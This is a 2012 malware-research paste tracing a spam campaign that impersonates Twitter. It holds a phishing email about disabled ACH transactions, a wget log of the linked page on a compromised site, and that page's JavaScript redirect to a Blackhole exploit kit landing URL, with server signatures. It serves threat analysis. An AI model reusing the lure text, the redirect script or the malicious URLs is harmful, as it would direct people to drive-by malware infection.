#MalwareMustDie - Spam to BHEK to xxxx

1. =====================================
2. #MalwareMustDie - A quest
3. Spam to BHEK to ...
4.  
5. =====================================
6.  
7. // Folowing "Twitter-Security-looks" Spams:
8. // hint & follow by Ken Pryor
9.  
10. // Spam in orig format(txt)
11.  
12. Delivered-To: xxxxx@xxxxx.com
13. Received: by 10.216.95.198 with SMTP id p48csp285246wef;
14.         Wed, 26 Dec 2012 06:58:12 -0800 (PST)
15. X-Received: by 10.182.36.8 with SMTP id m8mr22507914obj.93.1356533891842;
16.         Wed, 26 Dec 2012 06:58:11 -0800 (PST)
17. Return-Path: <JuniorGastelum@schmitt-title.com>
18. Received: from ????-?? ([92.46.240.84])
19.         by mx.google.com with ESMTP id y4si7207599obv.81.2012.12.26.06.58.08;
20.         Wed, 26 Dec 2012 06:58:11 -0800 (PST)
21. Received-SPF: softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) client-ip=92.46.240.84;
22. Authentication-Results: mx.google.com; spf=softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) smtp.mail=JuniorGastelum@schmitt-title.com
23. Received: from ham-cannon.twitter.com ([199.59.148.236]) by schmitt-title.com;
24.      Wed, 26 Dec 2012 03:58:10 +0600
25. Date: Wed, 26 Dec 2012 03:58:10 +0600
26. From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
27. Reply-To: noreply@postmaster.twitter.com
28. To: xxxxx@xxxxx.com
29. Message-Id: <1KC8PY8L49UMD_TPA1QU8PAABSYQ9C03@522357004.twitter.com.tmail>
30. Subject: Re: Banking security update.
31. Mime-Version: 1.0
32. Content-Type: multipart/alternative; boundary=mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
33. X-Campaignid: twitter51056991109478
34. X-Twitterimpressionid: am-57174748899437484147607592
35. Errors-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
36. Bounces-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
37. Return-Path: c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com
38. X-OriginalArrivalTime: Wed, 26 Dec 2012 03:58:10 +0600 FILETIME=[726C4133:38072607]
39.  
40. --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
41. Content-Type: text/plain; charset=UTF-8
42. Content-Transfer-Encoding: 7bit
43.  
44. Dear Online Account Operator,
45.  
46. Your ACH  transactions have been
47. temporarily disabled.
48.  View details
49.  
50. Best regards,
51. Security department
52.  
53.  
54. --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
55. Content-Type: text/html; charset=UTF-8
56. Content-Transfer-Encoding: 7bit
57.  
58.  
59. <html>
60.   <body >
61. Dear Online Account Operator, <br><br>
62. Your ACH  transactions have been <br>
63. temporarily disabled. <br>
64.  <a href="http://www.bibliotekarz.pl/sites/all/themes/mail2.htm">View details </a><br><br>
65.  
66. Best regards,<br>
67. Security department<br><br><br><br><br>
68.  
69. </body>
70. </html>
71. --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51--
72.  
73.  
74. // fetch the stuff..tips: use the email domain source as referer
75.  
76. --2012-12-27 02:24:45--  http://www.bibliotekarz.pl/sites/all/themes/mail2.htm
77. Resolving www.bibliotekarz.pl (www.bibliotekarz.pl)... 194.181.21.145
78. Caching www.bibliotekarz.pl => 194.181.21.145
79. Connecting to www.bibliotekarz.pl (www.bibliotekarz.pl)|194.181.21.145|:80... connected.
80. Created socket 3.
81. Releasing 0x28804160 (new refcount 1).
82.  
83. ---request begin---
84. GET /sites/all/themes/mail2.htm HTTP/1.1
85. Referer: http://twitter.com
86. User-Agent: MalwareMustDie is painting red X-mark on your door!
87. Accept: */*
88. Host: www.bibliotekarz.pl
89. Connection: Keep-Alive
90.  
91. ---request end---
92. HTTP request sent, awaiting response...
93. ---response begin---
94. HTTP/1.1 200 OK
95. Date: Wed, 26 Dec 2012 16:16:06 GMT
96. Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 PHP/5.2.14
97. Last-Modified: Wed, 26 Dec 2012 16:07:02 GMT
98. ETag: "250ef8-1a7-4d1c39eecf580"
99. Accept-Ranges: bytes
100. Content-Length: 423
101. Cache-Control: max-age=1209600
102. Expires: Wed, 09 Jan 2013 16:16:06 GMT
103. Keep-Alive: timeout=5, max=100
104. Connection: Keep-Alive
105. Content-Type: text/html
106.  
107. ---response end---
108. 200 OK
109. Saving to: `mail2.htm'
110. 2012-12-27 02:24:47 (8.08 MB/s) - `mail2.htm' saved [423/423]
111.  
112.  
113. // See the inside....
114.  
115. @unixfreaxjp /malware]$ cat mail2.htm
116. <html>
117.  <head>
118.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
119. <title>Please wait</title>
120.  </head>
121.  <body>
122. <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
123. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
124.  
125. <script>
126. var1=49;
127. var2=var1;
128. if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
129. </script>
130.  
131. </body>
132.  
133.  
134. // LANDING PAGE:
135.  
136.  http://bunakaranka.ru:8080/forum/links/column.php
137.  
138. // Blackhole PoC:
139.  
140. Resolving bunakaranka.ru (bunakaranka.ru)... 210.71.250.131, 187.85.160.106, 91.224.135.20
141. Caching bunakaranka.ru => 210.71.250.131 187.85.160.106 91.224.135.20
142. Connecting to bunakaranka.ru (bunakaranka.ru)|210.71.250.131|:8080... connected.
143.  
144. // THis pattern/signatures;:
145. Server: nginx/1.0.10
146. Date: Wed, 26 Dec 2012 17:30:46 GMT
147. Content-Type: text/html; charset=CP-1251
148. Connection: keep-alive
149. X-Powered-By: PHP/5.3.18-1~dotdeb.0
150.  
151.  
152. // You know the drill from here, just follow guidance posts in malwaremustdie.blogspot.com !
153.  
154. ---
155. MalwareMustDie - Dec 26th 2012